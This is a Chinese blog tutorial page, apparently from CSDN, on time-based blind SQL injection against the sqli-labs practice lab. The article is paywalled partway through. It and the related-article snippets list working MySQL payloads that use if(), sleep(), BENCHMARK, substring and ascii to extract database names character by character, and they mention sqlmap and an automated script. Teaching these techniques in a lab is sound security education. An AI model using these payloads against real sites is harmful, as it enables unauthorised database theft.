sql注入-延时注入

最新推荐文章于 2025-03-19 22:49:39 发布
最新推荐文章于 2025-03-19 22:49:39 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: 笔记 杂七杂八 文章标签: sql注入 延时注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wuguojiuai/article/details/124466292
版权
本文详细介绍了延时注入技术在渗透测试中的应用,通过实例展示了如何利用延时注入判断条件,获取数据库信息,包括数据库名称、表名、字段及数据内容。通过对SQL语句的构造,演示了如何利用延时注入来探测数据库结构和数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

渗透测试基础课-课程进度_不死的小鱼的博客-优快云博客

延时注入和布尔盲注差不多
为什么要延时
因为有的时候我们知道这个地方存在注入但是页面返回信息一样
加了个if延时条件判断
if(条件,是,否)

http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201
返回14秒
http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(10),1)--%201
正常返回4秒

length(database())=1
获取到了数据库长度
请求:localhost/Less-8/index.php?id=1' and if(length(database())=8,sleep(3),1) -- 11  
返回:正常

用到两个函数
substring 截取字符串(1.截取哪个字符串, 2 从哪一位开始,3 取几位)
获取数据库库名:
http://localhost/Less-8/index.php?id=1' and if((select substring(database(),1,1))='s',sleep(3),1) -- 1  获取库名的第一位
ascii
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(database(),

最低0.47元/天 解锁文章
SQL注入延时注入
m0_56578216的博客
08-23 1063
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
sql注入延时注入
weixin_45653478的博客
04-09 2844
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入延时盲注原理与应用
最新发布
lubiii_的博客
03-19 1077
' AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END)--' AND (SELECT 1 FROM (SELECT SLEEP(5))a WHERE 条件)--' AND IF(条件, BENCHMARK(10000000,MD5('test')), 0)--IF(条件, BENCHMARK(10000000,MD5('a')), 0)IF(条件, SLEEP(5), 0) -- 条件为真时延时5秒。条件为真时延时,为假时触发除零错误(页面异常)。
SQL注入延时注入
qq_45557130的博客
10-07 1679
sql注入延时注入
4.3SQL注入延时注入
qq_64177395的博客
09-04 1088
mid(a,b,c): 从b开始,截取a字符串的c位。substr(a,b,c): 从b开始,截取字符串a的c长度。参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c。1.防止引号 ‘ “ 转义。
封神台SQL注入-延时注入
qq_40941912的博客
10-05 450
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时盲注 R
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2829
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
SQL注入-概述-ppt.pptx
10-27
7. **延时注入**:通过延迟查询的时间来验证SQL语句是否执行成功。 **攻击后果** 一旦SQL注入成功,攻击者可能会执行以下操作: 1. **暴库**:暴露整个数据库内容,获取大量敏感信息。 2. **获取管理员账户**:利用...
sql注入-自动化延时脚本
m0_58853680的博客
01-03 558
这段代码的主要目的是利用SQL注入攻击来获取目标数据库的名称。它通过发送带有特定payload参数的HTTP GET请求,结合响应时间判断是否存在预期的结果,以此实现盲注攻击。(即用户与密码拼接的查询)。正确修复这个问题后,代码才能正常工作并提取出目标数据库的名称。需要注意的是,这里的代码实现有一个逻辑问题:在获取数据库名时应该使用。(即“select database()”查询)而不是。可根据自己需要去修改payload。
sql注入——延时注入
qq_52843411的博客
08-23 1190
无论我们怎样变化,或者改变闭合,都无法是页面做出不同的回显,我们有理由相信他为一个静态页面,当然,作为一个练习,这个肯定是有漏洞的,我们可以通过页面相应的时间来做出判断,我们可以通过sleep()函数,来使页面进行延迟响应。我们对页面进行了延时,导致页面的响应时间比正常情况下都要慢五秒钟,我们可以通过对响应时间的长短,来判断真假,要判断真假,就要用到我们的if函数。)第一个字段为判读语句,第二个字段为判断为真时执行的语句,第三个字段为判断为假时执行的语句。我们可知第一个字符ASCII为53,即5。
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
SQL注入--延时注入
weixin_52351575的博客
10-13 873
的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f。原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对。我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化。接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值。的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长。所以判定我们输入的sql代码得到了执行。于是,我们输入代码,来查询数据库的长度。改90的值,依次递增,最终得到代码。
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 2250
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 5161
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入-布尔盲注
weixin_45095113的博客
03-12 893
布尔盲注
SQL注入漏洞-05】延时注入靶场实战
cc
02-04 6568
布尔盲注和延时注入的相同点:都是通过浏览器页面两种不同的响应来推测输入条件的真假性布尔盲注和延时注入的不同点:布尔盲注是在条件真假时页面会有不同的显示延时注入则是只能在响应时间上推测显示结果的真假延时注入的缺点:有时候网页响应慢并不是因为sleep语句起的效果,也可能是网络等外部因素的影响。同时时间成本很高。
sql注入之时间注入
m0_63436163的博客
04-15 1046
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入-u 表示检测的 url。-p 指定的检测参数。
SQL注入工具:高效布尔盲注与延时注入脚本
以上内容对SQL注入技术、SQLmap工具、布尔盲注和延时注入的具体技术细节以及防范措施进行了详细阐述。同时,对涉及的Python脚本以及压缩包子文件列表中的文件进行了初步解读,给出了可能的学习和应用场景。通过理解...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值